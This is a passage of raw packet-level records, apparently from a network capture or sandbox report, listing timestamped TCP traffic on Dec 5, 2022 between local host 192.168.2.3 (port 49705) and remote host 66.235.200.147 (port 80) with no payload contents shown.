Dec 5, 2022 01:32:37.833142996 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.833151102 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.833184958 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.833192110 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.833226919 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.833230019 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.833267927 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.833275080 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.833308935 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.833313942 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.833349943 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.833350897 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.833391905 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.833393097 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.833436012 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.833436966 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.833475113 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.833477974 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.833515882 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.833515882 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.833558083 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.833558083 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.833599091 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.833601952 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.833643913 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.833645105 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.833686113 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.833687067 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.833722115 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.833724976 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.833761930 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.833764076 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.833805084 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.833805084 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.833847046 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.833848000 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.833888054 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.833894014 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.833929062 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.833936930 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.833971977 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.833977938 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.834013939 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.834017992 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.834055901 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.834059954 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.834101915 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.834104061 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.834141970 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.834147930 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.834183931 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.834188938 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.834224939 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.834230900 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.834265947 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.834271908 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.834307909 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.834311962 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.834347963 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.834351063 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.834389925 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.834391117 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.834430933 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.834433079 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.834475040 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.834475994 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.834515095 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.834517002 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.834558964 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.834558964 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.834599972 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.834600925 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.834640026 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.834641933 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.834685087 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.834686041 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.834727049 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.834731102 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.834769964 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.834773064 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.834810972 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.834815025 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.834851980 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.834856033 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.834896088 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.834909916 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.834953070 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.834959030 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.834994078 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.834999084 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835035086 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835042000 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835077047 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835082054 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835119963 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835123062 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835165977 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835166931 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835216045 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835216999 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835239887 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835258961 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835258961 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835273981 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835280895 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835298061 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835302114 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835321903 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835323095 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835335016 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835342884 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835361004 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835366011 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835380077 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835387945 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835407019 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835408926 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835428953 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835436106 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835448980 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835449934 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835467100 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835473061 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835489035 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835494995 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835516930 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835522890 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835537910 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835551977 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835558891 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835566044 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835580111 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835581064 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835601091 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835602045 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835613966 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835622072 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835643053 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835644007 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835663080 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835665941 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835685015 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835685015 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835704088 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835705996 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835726976 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835727930 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835747957 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835752010 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835768938 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835768938 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835789919 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835793018 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835810900 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835813999 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835833073 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835836887 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835855007 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835859060 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835876942 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835882902 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835899115 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835899115 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835920095 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835922003 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835942030 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835947990 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835962057 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835974932 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.835983038 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.835987091 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836004972 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836021900 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836028099 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836042881 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836050034 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836054087 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836071968 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836076021 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836088896 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836095095 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836116076 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836117983 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836131096 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836146116 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836165905 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836185932 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836186886 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836209059 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836220026 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836230040 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836245060 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836251974 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836256981 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836270094 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836275101 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836283922 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836302996 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836323023 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836343050 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836345911 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836364031 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836368084 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836385012 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836393118 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836405993 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836406946 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836425066 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836427927 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836448908 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836448908 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836464882 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836469889 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836488008 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836491108 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836512089 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836529970 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836532116 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836553097 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836554050 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836572886 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836576939 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836591959 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836596012 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836611986 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836618900 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836632967 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836641073 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836663008 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836679935 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836683035 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836704016 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836704969 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836725950 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836746931 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836749077 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836767912 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836771965 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836783886 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836790085 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836793900 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836807966 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836812973 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836833954 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836834908 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836854935 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836855888 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836874962 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836875916 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836898088 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836898088 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836915970 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836922884 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836942911 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836944103 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836965084 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836966991 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.836986065 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.836987019 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837007046 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837007999 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837028980 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837028980 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837049007 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837050915 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837069988 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837074041 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837086916 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837094069 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837112904 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837116003 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837136030 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837140083 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837158918 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837162018 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837181091 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837183952 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837196112 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837204933 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837223053 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837227106 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837245941 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837248087 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837260008 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837269068 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837285995 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837290049 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837310076 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837312937 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837325096 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837335110 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837349892 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837354898 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837372065 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837377071 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837393045 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837399960 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837418079 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837420940 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837433100 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837441921 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837455988 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837462902 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837477922 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837483883 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837502003 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837507963 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837519884 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837528944 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837543011 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837551117 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837567091 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837572098 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837590933 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837593079 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837605000 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837614059 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837630987 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837635040 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837645054 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837656021 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837671995 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837678909 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837697983 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837698936 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837721109 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837726116 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837742090 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837742090 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837760925 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837765932 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837786913 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837790012 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837807894 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837812901 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837829113 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837836027 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837846994 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.837851048 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.837872028 CET	80	49705	66.235.200.147	192.168.2.3
